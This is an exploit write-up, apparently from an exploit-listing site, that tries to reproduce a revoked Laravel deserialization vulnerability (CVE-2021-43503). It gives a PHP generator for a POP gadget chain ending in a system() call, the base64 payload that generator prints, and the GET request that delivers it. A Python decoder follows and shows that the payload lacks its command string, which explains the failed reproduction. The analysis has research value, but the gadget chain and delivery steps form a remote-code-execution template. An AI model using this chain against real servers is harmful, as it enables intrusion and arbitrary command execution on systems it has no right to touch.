## https://sploitus.com/exploit?id=31D7A39E-44FB-5F22-BA26-E964E26E0154
> **Warning**
> The vulnerability has been revoked
# Override
This is about [CVE-2021-43503](https://vulners.com/cve/CVE-2021-43503). I could not reproduce the vulnerability with the published [exploit](https://github.com/guoyanan1g/Laravel-vul/issues/2#issue-1045655892).
## Requirements
* PHP 7.1.*
* Composer <= 2.2.12
## Reproducing the vulnerability
1. Start the service
```bash
composer install
cp .env.example .env
php artisan key:generate
php artisan serve # listens on localhost:8000
```
2. Generate the POP chain payload
```php
<?php
// The gadget classes are re-declared locally with the same names and property
// visibility as the Laravel/Mockery originals, so that serialize() emits the
// exact (mangled) property names that unserialize() maps back onto the real classes.
namespace Illuminate\Routing{
    // Entry point of the chain: the real class's __destruct() calls register()
    // while $registered is false, which calls $this->registrar->register(...).
    class PendingResourceRegistration{
        protected $registrar;
        protected $name;
        protected $controller;
        protected $options = [];
        protected $registered = false;
        public function __construct($b){
            $this->registrar=$b;
        }
    }
}
namespace Illuminate\Queue\Capsule{
    // The real Manager forwards unknown method calls to the object in $manager via __call().
    class Manager{
        protected $manager;
        public function __construct($c)
        {
            // $manager is null here, so PHP 7 silently creates a stdClass and emits
            // "Warning: Creating default object from empty value" (PHP 8 throws an Error).
            $this->manager->method=$c;
        }
    }
}
namespace Mockery{
    // The real ClosureWrapper::__invoke() calls $this->closure with its arguments.
    class ClosureWrapper{
        private $closure;
        // This constructor takes no parameter: the argument passed below
        // ("mkdir hello") is discarded and only the callable name "system" is serialized.
        public function __construct(){
            $this->closure="system";
        }
    }
}
namespace{
    use Illuminate\Queue\Capsule\Manager;
    use Illuminate\Routing\PendingResourceRegistration;
    use Mockery\ClosureWrapper;
    $c=new ClosureWrapper("mkdir hello");
    $b=new Manager($c);
    $a=new PendingResourceRegistration($b);
    echo base64_encode(serialize($a));
}
```
> **Note**
>
> I replaced `urlencode(serialize($a))` with `base64_encode(serialize($a))`.
>
> And I replaced `dir` with `mkdir hello` so that successful RCE leaves a visible artifact (a `hello/` directory).
Running it prints the following (ignore the PHP Warning "Creating default object from empty value", which comes from assigning a property on the null `$manager`):
```
Tzo0NjoiSWxsdW1pbmF0ZVxSb3V0aW5nXFBlbmRpbmdSZXNvdXJjZVJlZ2lzdHJhdGlvbiI6NTp7czoxMjoiACoAcmVnaXN0cmFyIjtPOjMyOiJJbGx1bWluYXRlXFF1ZXVlXENhcHN1bGVcTWFuYWdlciI6MTp7czoxMDoiACoAbWFuYWdlciI7Tzo4OiJzdGRDbGFzcyI6MTp7czo2OiJtZXRob2QiO086MjI6Ik1vY2tlcnlcQ2xvc3VyZVdyYXBwZXIiOjE6e3M6MzE6IgBNb2NrZXJ5XENsb3N1cmVXcmFwcGVyAGNsb3N1cmUiO3M6Njoic3lzdGVtIjt9fX1zOjc6IgAqAG5hbWUiO047czoxMzoiACoAY29udHJvbGxlciI7TjtzOjEwOiIAKgBvcHRpb25zIjthOjA6e31zOjEzOiIAKgByZWdpc3RlcmVkIjtiOjA7fQ==
```
3. Deliver it through an HTTP GET parameter:
Open http://localhost:8000/?ser=Tzo0NjoiSWxsdW1pbmF0ZVxSb3V0aW5nXFBlbmRpbmdSZXNvdXJjZVJlZ2lzdHJhdGlvbiI6NTp7czoxMjoiACoAcmVnaXN0cmFyIjtPOjMyOiJJbGx1bWluYXRlXFF1ZXVlXENhcHN1bGVcTWFuYWdlciI6MTp7czoxMDoiACoAbWFuYWdlciI7Tzo4OiJzdGRDbGFzcyI6MTp7czo2OiJtZXRob2QiO086MjI6Ik1vY2tlcnlcQ2xvc3VyZVdyYXBwZXIiOjE6e3M6MzE6IgBNb2NrZXJ5XENsb3N1cmVXcmFwcGVyAGNsb3N1cmUiO3M6Njoic3lzdGVtIjt9fX1zOjc6IgAqAG5hbWUiO047czoxMzoiACoAY29udHJvbGxlciI7TjtzOjEwOiIAKgBvcHRpb25zIjthOjA6e31zOjEzOiIAKgByZWdpc3RlcmVkIjtiOjA7fQ== in a browser. (This particular base64 string contains no `+` or `/`, so it can be placed in the query string without URL-encoding; a payload that does contain them must be URL-encoded or `+` will arrive as a space.)
![Access exp case](./resources/image/access-exp-case.png)
It did not create `hello/` in `public/`.
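Before attributing the negative result to the gadget chain itself, it is worth checking what `unserialize()` would actually receive. The following is an added example written for this page, not code from the Laravel-vul repository or the exploit author: a minimal Python reader for PHP's `serialize()` format (only `N`, `b`, `i`, `d`, `s`, `a` and `O` records, no references or custom `C:` records) applied to the base64 payload printed above, which is copied verbatim from step 2.

```python
"""Decode the README's base64 payload and list what unserialize() would build.

Added example for this page; not part of the Laravel-vul repository.
"""
import base64
from dataclasses import dataclass

# Payload copied verbatim from the README (the output of the PHP generator above).
PAYLOAD_B64 = (
    "Tzo0NjoiSWxsdW1pbmF0ZVxSb3V0aW5nXFBlbmRpbmdSZXNvdXJjZVJlZ2lzdHJhdGlvbiI6NTp7"
    "czoxMjoiACoAcmVnaXN0cmFyIjtPOjMyOiJJbGx1bWluYXRlXFF1ZXVlXENhcHN1bGVcTWFuYWdlciI6MTp7"
    "czoxMDoiACoAbWFuYWdlciI7Tzo4OiJzdGRDbGFzcyI6MTp7czo2OiJtZXRob2QiO086MjI6Ik1vY2tlcnlcQ2xvc3VyZVdyYXBwZXIiOjE6"
    "e3M6MzE6IgBNb2NrZXJ5XENsb3N1cmVXcmFwcGVyAGNsb3N1cmUiO3M6Njoic3lzdGVtIjt9fX1zOjc6IgAqAG5hbWUiO047"
    "czoxMzoiACoAY29udHJvbGxlciI7TjtzOjEwOiIAKgBvcHRpb25zIjthOjA6e31zOjEzOiIAKgByZWdpc3RlcmVkIjtiOjA7fQ=="
)


@dataclass
class PhpObject:
    """An O:... record: class name plus its properties keyed by bare property name."""
    cls: str
    props: dict


def _read_int(buf, pos):
    """Read decimal digits at buf[pos] up to ':'; return (value, index after the ':')."""
    end = buf.index(b":", pos)
    return int(buf[pos:end].decode("ascii")), end + 1


def _prop_name(key):
    # serialize() mangles non-public names: "\0*\0name" (protected), "\0Class\0name" (private).
    if isinstance(key, str) and key.startswith("\x00"):
        return key.split("\x00", 2)[2]
    return key


def parse_php(buf, pos=0):
    """Parse one serialized value starting at buf[pos]; return (value, next_pos)."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                   # N;
        return None, pos + 2
    if tag in (b"b", b"i", b"d"):                     # b:1;  i:42;  d:1.5;
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end].decode("ascii")
        conv = {b"b": lambda r: r == "1", b"i": int, b"d": float}[tag]
        return conv(raw), end + 1
    if tag == b"s":                                   # s:LEN:"bytes";  LEN counts bytes
        length, pos = _read_int(buf, pos + 2)
        start = pos + 1                               # skip the opening quote
        text = buf[start:start + length].decode("latin-1")
        return text, start + length + 2               # skip closing quote and ';'
    if tag == b"a":                                   # a:COUNT:{key value ...}
        count, pos = _read_int(buf, pos + 2)
        pos += 1                                      # skip '{'
        items = {}
        for _ in range(count):
            key, pos = parse_php(buf, pos)
            items[key], pos = parse_php(buf, pos)
        return items, pos + 1                         # skip '}'
    if tag == b"O":                                   # O:LEN:"Class":COUNT:{key value ...}
        name_len, pos = _read_int(buf, pos + 2)
        start = pos + 1
        cls = buf[start:start + name_len].decode("latin-1")
        count, pos = _read_int(buf, start + name_len + 2)   # skip '":'
        pos += 1                                      # skip '{'
        props = {}
        for _ in range(count):
            key, pos = parse_php(buf, pos)
            props[_prop_name(key)], pos = parse_php(buf, pos)
        return PhpObject(cls, props), pos + 1         # skip '}'
    raise ValueError("unsupported or malformed record at offset %d" % pos)


def _walk(value):
    """Pre-order traversal over objects, arrays and scalar leaves (keys are not visited)."""
    yield value
    if isinstance(value, PhpObject):
        children = value.props.values()
    elif isinstance(value, dict):
        children = value.values()
    else:
        return
    for child in children:
        yield from _walk(child)


def decode_payload(b64):
    return parse_php(base64.b64decode(b64))[0]


def class_chain(root):
    """Class names outermost first, i.e. the order unserialize() instantiates them."""
    return [v.cls for v in _walk(root) if isinstance(v, PhpObject)]


def string_values(root):
    """Every string *value* in the graph; property and array keys are excluded."""
    return [v for v in _walk(root) if isinstance(v, str)]


def carries_string(root, needle):
    return any(needle in s for s in string_values(root))


if __name__ == "__main__":
    root = decode_payload(PAYLOAD_B64)
    print("objects:", " -> ".join(class_chain(root)))
    print("string values:", string_values(root))
    print("contains 'mkdir hello':", carries_string(root, "mkdir hello"))
```

Run as a script it prints the object graph (`PendingResourceRegistration -> Manager -> stdClass -> ClosureWrapper`) and the string values, of which there is exactly one: `system`. The `mkdir hello` argument never entered the payload, because the generator's `ClosureWrapper::__construct()` takes no parameter and discards it, and `Manager::$manager` is a bare `stdClass` (the object PHP 7 creates, with the Warning, when a property is assigned on `null`). Whatever the reachability of the chain in this Laravel version, a payload that contains no command string cannot create `hello/`, so the missing directory alone does not settle whether the chain fires.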